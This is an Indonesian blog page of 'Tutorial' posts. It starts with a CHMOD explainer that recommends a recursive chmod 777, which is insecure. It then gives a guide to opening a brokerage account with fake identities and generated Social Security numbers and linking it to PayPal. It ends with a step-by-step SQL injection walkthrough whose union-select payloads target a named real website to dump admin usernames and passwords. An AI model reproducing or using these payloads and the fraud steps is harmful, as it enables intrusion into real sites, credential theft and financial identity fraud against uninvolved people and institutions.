Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Pernah mendengar kata CHMOD? Saya juga baru tau apa itu CHMOD. Bagi pengguna sistem operasi Linux dan seorang web developper, mungkin kata tersebut sudah tidak asing lagi. CHMOD adalah kepanjangan dari Change Mode, sebuah perintah untuk memberi hak akses/permisions kepada pemilik, user biasa, dan non user (ini pengertian versi saya :) ). CHMOD inilah yang menjaga keamanan dari suatu data, jika ada user nakal yang berusaha untuk mengakses, mengubah, bahkan membaca data yang bukan haknya.
Ok, Langsung aja . .. Hak akses suatu data, disimbolkan dengan angka.
Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group. Berikut contohnya :
Contoh CHMOD :
Chmod 753, berarti :
READ MORE
Ok, Langsung aja . .. Hak akses suatu data, disimbolkan dengan angka.
- 0 = Tidak ada hak akses
- 1 = Hak akses untuk masuk dan mengeksekusi suatu data atau folder (direktori)
- 2 = Hak akses untuk menulis/mengubah suatu data atau folder (direktori)
- 4 = Hak akses untuk membaca suatu data atau folder (direktori)
Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group. Berikut contohnya :
Contoh CHMOD :
Chmod 753, berarti :
- 7 = 4+2+1 : root (pemilik file) mempunyai hak untuk mengeksekusi (1), menulis (2), dan membaca (4) suatu data atau direktori
- 5 = 4+1 : user group mempunyai hak untuk membaca (4) dan mengeksekusi (1) suatu data atau direktori
- 3 = 2+1 : user non group mempunyai hak untuk menulis (2) dan mengeksekusi suatu data atau direktori
Contoh Penggunaan CHMOD
Jika ingin mengubah hak akses dari suatu data atau direkori, dari hak akses 644 (setting default dari pihak hosting) menjadi 755 (agar dapat dibaca) berikut caranya :
chmod 755 [file_name]
chmod 755 index.php (untuk file)
chmod 755 /web/images (untuk folder/direktori)
Kalau ingin mengubah hak akses suatu folder yang di dalamnya ada banyak folder dan file, bisa menggunakan perintah berikut :
find [direktori] -type f -exec chmod 777 {} \; (untuk file)
find [direktori] -type d -exec chmod 777 {} \; (untuk folder / direktori)
CONTOH :
find /home/gathel/htdocs-linux -type f -exec chmod 777 {} \; (untuk file)
find /home/gathel/htdocs-linux -type d -exec chmod 777 {} \; (untuk folder / direktori)
Ok dan masih banyak lagi . . . ini cuman sebagian doank kok . ..
Gunakan VPN (ingat IP yg anda pake, IP US yahh)
Buat dulu EMAIL dan AKun paypai nya (Samakan semua data2 baik itu di email, pp dan VBA)
- Ke us.etrade.com/e/t/home dan Daftar Account Baru dengan mengklik "OPEN ACCOUNT". Klik "APPLY NOW" pada
- Sekarang Anda akan perlu untuk mengisi data2. JANGAN menggunakan data2 Anda yang sesungguhnya. Gunakan Generator Fake Name (Tanya om google, cari generator yg lengkap dgn info SSN nya, banyak kok )
(PENTING: Gunakan identitas dari AS)! Gunakan email yang dapat Anda akses. Untuk Rekening Type, Pilih" Individual account ".
- Untuk "Langkah 1: Pilih Account Type", Pilih "Cash Account Only".
- Masukkan alamat palsu dan nomor telepon yang Anda dapatkan dari fake name, dan pastikan bahwa kedua kotak dicentang!
- Sekarang Anda akan memerlukan SSN (Social Security Number). Seperti biasa, JANGAN menggunakan data Anda yang sesungguhnya. Gunakan Fake Name Generator. Juga pastikan Anda meletakkan "Country of Legal Residence " as " United State "dan klik" US Citizen ".
- Untuk "Employment Status" Mengenai pekerjaan anda. Pastikan itu adalah di kota yang sama, negara, zip, dan negara. JANGAN membuat alamat perusahaan/tempat kerja Anda sama seperti di mana alamat rumah anda berada. Pilih "No" untuk semua pilihan.
- Sekarang untuk "Sweep Account", Pilih yang pertama dan Pilih "No" untuk sisanya.
- Pastikan bahwa semua kotak dicentang dihilangkan pada "Select Documents for Electronic Delivery".
- Klik I accept dan No untuk kotak yg dicentang. (Just Click Continue)
- Sekarang pilih "No. I want to create a new user ID and password for this account ".
- Buatlah account yang dapat Anda ingat.
- Nggak perlu login, karena setelah anda create new user ID dan password, anda sudah dapat melihat Virtual BANK ACC Number di halaman tsb (sebelah kanan atas).
- Sekarang buka akun paypai anda, pergi ke "Add Bank Account" halaman dalam paypai.
- Masukkan routing number = 056073573.
- Masukkan Bank account number= Virtual bank acc number yg sudah anda dapatkan.
- Sekarang pergi ke halaman berikutnya dan masukkan informasi login Anda seperti yang anda buat di step 11 dan 12
- Pilih the Instant option dan silahkan tunggu beberapa menit.
- Done !!!!
Ok, Langsung aja gak usah banyak basa basi, ntar malah tambah basi . ..
1- Cari Target Di google dulu Pake dork nya terserah ente kalo di contoh ini, ane pake dork ini inurl:"news_id.php?id="
2- Kalo udah Nemu, Langsung di Check aja pake tanda ( ' ) di akhir url nya.Contoh :
3- ok saat nya exploitasi . . !!! menggunkan perintah order+by+1-- Contoh :
Berarti ada 5 Column lanjut ke step Selanjut nya
4- menggunakan perintah union+all+select+1,2,3,4,5-- Contoh :
fungsi buat inject web tersebut . . .
5- Menggunakan Perintah version() untuk melihat versi database MySQL nya !! Contoh :
nah ntar di website tersebut bakalan muncul versi database MySQL nya.
6- Menggunakan Perintah group_concat(table_name) trus di tambahain perintah ini
7- menggunkan perintah group_concat(column_name) dan di tambah perintah :
nah . .. ntar di situ bakalan muncul column column dari table login .
8- melihat isi column dari table login contoh :
tara !!!!! user name ama password udah keluar !!!! seperti di contoh ini !! username ama password dari admin gak di encrypt. tapi biasa nya username ama password di encrypt menggunakn MD5 kalo gak ya SH1
ok . . .. username ama password udah ketemu . .. berarti ente tinggal nyari halaman admin ama decrypt password (bagi yang password nya di encrypt lo)
Sekian dulu ... wasalam
READ MORE
1- Cari Target Di google dulu Pake dork nya terserah ente kalo di contoh ini, ane pake dork ini inurl:"news_id.php?id="
2- Kalo udah Nemu, Langsung di Check aja pake tanda ( ' ) di akhir url nya.Contoh :
http://luckyinternational.net/news/news_id.php?id=22msukin tanda ( ' ) di akhir url nya sehingga jadi kaya gini :
http://luckyinternational.net/news/news_id.php?id=22'Truzz . . ntar bakalan keluar error tapi gak usah di peduliin error nya . . . soal nya fungsi nya cuman buat nyari tau aja, apakah website tersebut bisa di SQLi apa gak . . . kalo keluar error, berarti bisa ... tapi ada juga lo yang gak keluar error tapi bisa di SQLi !!! ( Explor Your Brain )
3- ok saat nya exploitasi . . !!! menggunkan perintah order+by+1-- Contoh :
http://luckyinternational.net/news/news_id.php?id=22+order+by+1-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+2-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+3-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+4-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+5-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+6-- = Muncul Error !!
Berarti ada 5 Column lanjut ke step Selanjut nya
4- menggunakan perintah union+all+select+1,2,3,4,5-- Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,5--Hasil nya, bakalan muncul NOMER AJAIB !!!
fungsi buat inject web tersebut . . .
5- Menggunakan Perintah version() untuk melihat versi database MySQL nya !! Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,version()--
nah ntar di website tersebut bakalan muncul versi database MySQL nya.
6- Menggunakan Perintah group_concat(table_name) trus di tambahain perintah ini
+from+information_schema.tables+where+table_schema=database()--Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--nah, ntar disitu(di website nya bakalan keluar table table yang ada di database nya, truz ente cari table yang sekiranya itu buat nyimpen username ama password nya si admin ato si user . di contoh ini, ane ngambil table login habis itu ntar table nya di convert ke hexa pake tool ini ntar hasil nya kita pake di prosess selanjutnya
7- menggunkan perintah group_concat(column_name) dan di tambah perintah :
+from+information_schema.columns+where+table_name=0x hexa dari table--Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(column_name)+from+information_schema.tables+where+table_name=0x6c6f67696e--
nah . .. ntar di situ bakalan muncul column column dari table login .
8- melihat isi column dari table login contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(username,0x3a,password)+from+login--
tara !!!!! user name ama password udah keluar !!!! seperti di contoh ini !! username ama password dari admin gak di encrypt. tapi biasa nya username ama password di encrypt menggunakn MD5 kalo gak ya SH1
ok . . .. username ama password udah ketemu . .. berarti ente tinggal nyari halaman admin ama decrypt password (bagi yang password nya di encrypt lo)
Sekian dulu ... wasalam

